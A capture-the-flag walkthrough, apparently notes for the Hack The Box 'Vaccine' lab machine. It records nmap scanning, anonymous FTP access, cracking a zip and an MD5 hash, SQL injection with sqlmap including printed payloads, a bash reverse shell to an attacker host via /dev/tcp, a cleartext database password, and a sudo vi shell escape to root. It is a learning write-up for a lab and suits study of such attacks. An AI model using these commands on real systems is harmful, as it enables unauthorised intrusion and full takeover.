03.VACCINE

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.14.215
 |      Logged in as ftpuser
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 2 
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
 |   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
 |_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 |_http-title: MegaCorp Login
 |_http-server-header: Apache/2.4.41 (Ubuntu)

 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln {targetIP} -p 21,22,80
 PORT   STATE SERVICE
 21/tcp open  ftp
 22/tcp open  ssh
 80/tcp open  http
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.95.174
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.95.174:80/
 |     Form id: login__username
 |_    Form action: 
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit user flag and root flag.

root@htb:~$ ftp 10.129.95.174
 Connected to 10.129.95.174.
  220 (vsFTPd 3.0.3)
 Name (10.129.95.174:root): anonymous
  331 Please specify the password.
 Password: {arbitraryValue}
  230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.
ftp> dir
 229 Entering Extended Passive Mode (|||10189|)
 150 Here comes the directory listing.
 -rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
 226 Directory send OK.
ftp> get backup.zip
 local: backup.zip remote: backup.zip
 229 Entering Extended Passive Mode (|||10248|)
 150 Opening BINARY mode data connection for backup.zip (2533 bytes).
 100% |*************************************************************************************************************************************************|  2533        1.32 MiB/s    00:00 ETA
 226 Transfer complete.
 2533 bytes received in 00:00 (215.19 KiB/s)
ftp> exit
 221 Goodbye.

root@htb:~$ ls
 backup.zip  
root@htb:~$ unzip backup.zip 
 Archive:  backup.zip
 [backup.zip] index.php password: 
   skipping: index.php               incorrect password
   skipping: style.css               incorrect password

#conduct password cracking via John the Ripper
#convert the password protected file to john's format
root@htb:~$ find / -iname *2john* 2>/dev/null
 /usr/sbin/zip2john
 
 * display various tools John can use to convert password-protected file into a format that john can attack
 * naming style “{format}2john”

root@htb:~$ zip2john backup.zip > zip.hash
 Created directory: /home/str1f3/.john
 ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
 ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
 NOTE: It is assumed that all files in each archive have the same password.
 If that is not the case, the hash may be uncrackable. To avoid this, use
 option -o to pick a file at a time.

 * this cmd creates a hash challenge of a password protected file

root@htb:~$ ls
 zip.hash
 
root@htb:~$ cat zip.hash 
backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip$::backup.zip:style.css, index.php:backup.zip

root@htb:~$ find / -iname *rockyou* -type f 2>/dev/null
 /usr/share/wordlists/rockyou.txt.gz

root@htb:~$ john -wordlist=/usr/share/wordlists/rockyou.txt zip.hash
 Using default input encoding: UTF-8
 Loaded 1 password hash (PKZIP [32/64])
 Will run 4 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 741852963        (backup.zip)     
 1g 0:00:00:00 DONE (2025-03-22 22:24) 33.33g/s 273066p/s 273066c/s 273066C/s 123456..whitetiger
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed.
 
root@htb:~$ john --show zip.hash
 backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

 1 password hash cracked, 0 left

root@htb:~$ unzip backup.zip -d backup 
 PW: 741852963

 Archive:  backup.zip
 [backup.zip] index.php password: 741852963
  inflating: index.php               
  inflating: style.css  

root@htb:~$ ls -la backup
 total 16
 drwxr-xr-x  2 str1f3 str1f3 4096 Mar 22 22:32 .
 drwx------ 26 str1f3 str1f3 4096 Mar 22 22:30 ..
 -rw-r--r--  1 str1f3 str1f3 2594 Feb  3  2020 index.php
 -rw-r--r--  1 str1f3 str1f3 3274 Feb  3  2020 style.css

root@htb:~$ cat backup/index.php
 <!DOCTYPE html>
 <?php
   session_start();
     if(isset($_POST['username']) && isset($_POST['password'])) {
       if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
         $_SESSION['login'] = "true";
         header("Location: dashboard.php");
       }
     }
 ?>

root@htb:~$ hashid 2cb42f8734ea607eefed3b70af13bbd3
 ...
 [+] MD5
 
root@htb:~$ echo -n '2cb42f8734ea607eefed3b70af13bbd3' > hash
 ...
 
 * the -n prevents echo from adding newlines

root@htb:~$ hashcat -a 0 -m 0 hash rockyou.txt
 Dictionary cache built:
 * Filename..: rockyou.txt
 * Passwords.: 14344392
 * Bytes.....: 139921507
 * Keyspace..: 14344385
 * Runtime...: 0 secs

 2cb42f8734ea607eefed3b70af13bbd3:qwerty789                
                                                          
 Session..........: hashcat
 Status...........: Cracked
 Hash.Mode........: 0 (MD5)
 Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
 Time.Started.....: Sat Mar 22 22:50:19 2025 (0 secs)
 Time.Estimated...: Sat Mar 22 22:50:19 2025 (0 secs)
 Kernel.Feature...: Pure Kernel
 Guess.Base.......: File (rockyou.txt)
 Guess.Queue......: 1/1 (100.00%)
 Speed.#2.........:  4422.0 kH/s (0.16ms) @ Accel:512 Loops:1 Thr:1 Vec:8
 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
 Progress.........: 100352/14344385 (0.70%)
 Rejected.........: 0/100352 (0.00%)
 Restore.Point....: 98304/14344385 (0.69%)
 Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
 Candidate.Engine.: Device Generator
 Candidates.#2....: Dominic1 -> paashaas

 Started: Sat Mar 22 22:50:14 2025
 Stopped: Sat Mar 22 22:50:20 2025
 
 * the -a 0 represents "Attack Mode: Straight". it tells Hashcat to use the 
   dictionary attack mode — wordlist applied as-is.
 * the -m 0 represents "Hash Type: MD5". it specifies the hash type being cracke.
    - 0 = raw MD5.



 * username: admin
 * password: qwerty789

#enumerate target site; see where the credentials can be used
root@htb:~$ BROWSER > http://10.129.95.174/
 username: admin
 password: qwerty789
 
 MegaCorp Car Catalogue
 ...
 
#
root@htb:~$ BROWSER > http://10.129.95.174/dashboard.php
 search: null
 
 MegaCorp Car Catalogue
 URL: http://10.129.95.174/dashboard.php?search=null
 
 * this "search" parameter/variable could be using a backend DB server to
   when grabbing information
    - if there is a backend DB server where information is stored, this target
      may be vulnerable to SQLi

#SQLi
root@htb:~$ which sqlmap
 /usr/bin/sqlmap
 
root@htb:~$ sqlmap -hh
 ...
 Usage: python3 sqlmap [options]
 ...
 

root@htb:~$ BROWSER > http://10.129.95.174/dashboard.php?search=null > F12 > Storage > Cookies > 
 PHPSESSID:rgqtj2q53rvk6mlva0plqu7tsu
 
 * the cookie is required for authentication
    - this implies that the logged in user has elevated privileges; admin

root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=rgqtj2q53rvk6mlva0plqu7tsu"

 ...
 [13:50:27] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
 it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
 for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] 
 
 [13:50:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [13:50:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [13:50:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
 [13:50:32] [WARNING] reflective value(s) found and filtering out
 [13:50:32] [INFO] target URL appears to have 5 columns in query
 [13:50:32] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
 ---
 Parameter: search (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=null';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
 ---
 [13:50:34] [INFO] the back-end DBMS is PostgreSQL
 web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
 web application technology: Apache 2.4.41
 back-end DBMS: PostgreSQL
 [13:50:34] [INFO] fetched data logged to text files under '/home/str1f3/.local/share/sqlmap/output/10.129.95.174'

 [*] ending @ 13:50:34 /2025-04-17/

#exploit the vulnerability w/ sqlmap's os injection flag
root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=i333q3ar3rlq5ms4sg4h6895sa" --os-shell

 [13:59:00] [INFO] resuming back-end DBMS 'postgresql' 
 [13:59:00] [INFO] testing connection to the target URL
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: search (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=null';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
 ---
 [13:59:00] [INFO] the back-end DBMS is PostgreSQL
 web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
 web application technology: Apache 2.4.41
 back-end DBMS: PostgreSQL
 [13:59:00] [INFO] fingerprinting the back-end DBMS operating system
 [13:59:00] [INFO] the back-end DBMS operating system is Linux
 [13:59:00] [INFO] testing if current user is DBA
 [13:59:00] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
 [13:59:00] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 

#stabilize the shell
root@htb:~$ sudo nc -nlvp 443
 listening on [any] 443 ...

root@htb:~$ ifconfig
 tun0 inet 10.10.14.215 
 
os-shell> bash -c "bash -i >& /dev/tcp/{attackerIP}/443 0>&1"
 do you want to retrieve the command standard output? [Y/n/a]

 ...
 
root@htb:~$ nc ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.95.174] 38220
 bash: cannot set terminal process group (3335): Inappropriate ioctl for device
 bash: no job control in this shell
 postgres@vaccine:/var/lib/postgresql/11/main$ 
 
#activate a fully interactive shell - upgrade limited shell to an interactive TTY
postgres@vaccine:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
 <ain$ python3 -c 'import pty;pty.spawn("/bin/bash")'
 
 * EXTRAS: not required
    postgres@vaccine:/var/lib/postgresql/11/main$ CTRL+Z
     [1]+  Stopped                 sudo nc -nlvp 443
    root@htb:~$ stty raw -echo
    root@htb:~$ fg
    root@htb:~$ export TERM=xterm

postgres@vaccine:/var/lib/postgresql/11/main$ ls /var/lib/postgresql
 11
 user.txt
 
postgres@vaccine:/var/lib/postgresql/11/main$ cat /var/lib/postgresql/user.txt
 ec9b13ca4d6229cd5cc1e09980965bf7

#privesc
postgres@vaccine:~$ sudo -l
 sudo -l
 [sudo] password for postgres: ...

postgres@vaccine:~$ ls /var/www/html
 bg.png	       dashboard.js   index.php    style.css
 dashboard.css  dashboard.php  license.txt

 * if the target uses both PHP & SQL, there may be a chance that the password is in cleartext and could
   be located in /var/www/html
   
postgres@vaccine:~$ cat /var/www/html/dashboard.php | grep password
 <in$ cat /var/www/html/dashboard.php | grep password
 $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
 
postgres@vaccine:~$ sudo -l
 [sudo] password for postgres: P@s5w0rd!

 Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

 User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

 * ALT: used if/when the shell dies
   ssh [email protected]
    password: P@s5w0rd!
    
 * identified... sudo privileges to edit the pg_hba.conf file using vi by running sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf .
 
root@htb:~$ BROWSER > https://gtfobins.github.io/gtfobins/vi/#sudo
  sudo vi -c ':!/bin/sh' /dev/null
  
 * if the binary is allowed to run as superuser by sudo, it does not drop the 
   elevated privileges and may be used to access the file system, escalate or 
   maintain privileged access.

#
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf -c ':!/bin/sh'
 Sorry, user postgres is not allowed to execute '/bin/vi /etc/postgresql/11/main/pg_hba.conf -c :!/bin/sh' as root on vaccine.
 
 * this is due to sudo being restricted to only /bin/vi /etc/postgresql/11/main/pg_hba.conf .

postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
 ...
 vi :set shell=/bin/bash
 vi :shell

root@vaccine:/var/lib/postgresql# whoami
 root

root@vaccine:/var/lib/postgresql# id
 uid=0(root) gid=0(root) groups=0(root)

root@vaccine:/var/lib/postgresql# ls /root
 pg_hba.conf  root.txt  snap

root@vaccine:/var/lib/postgresql# cat /root/root.txt 
 dd6e058e814260bc70e9bbdef2715849

Previous02.OOPSIE Next04.UNIFIED

Last updated 6 months ago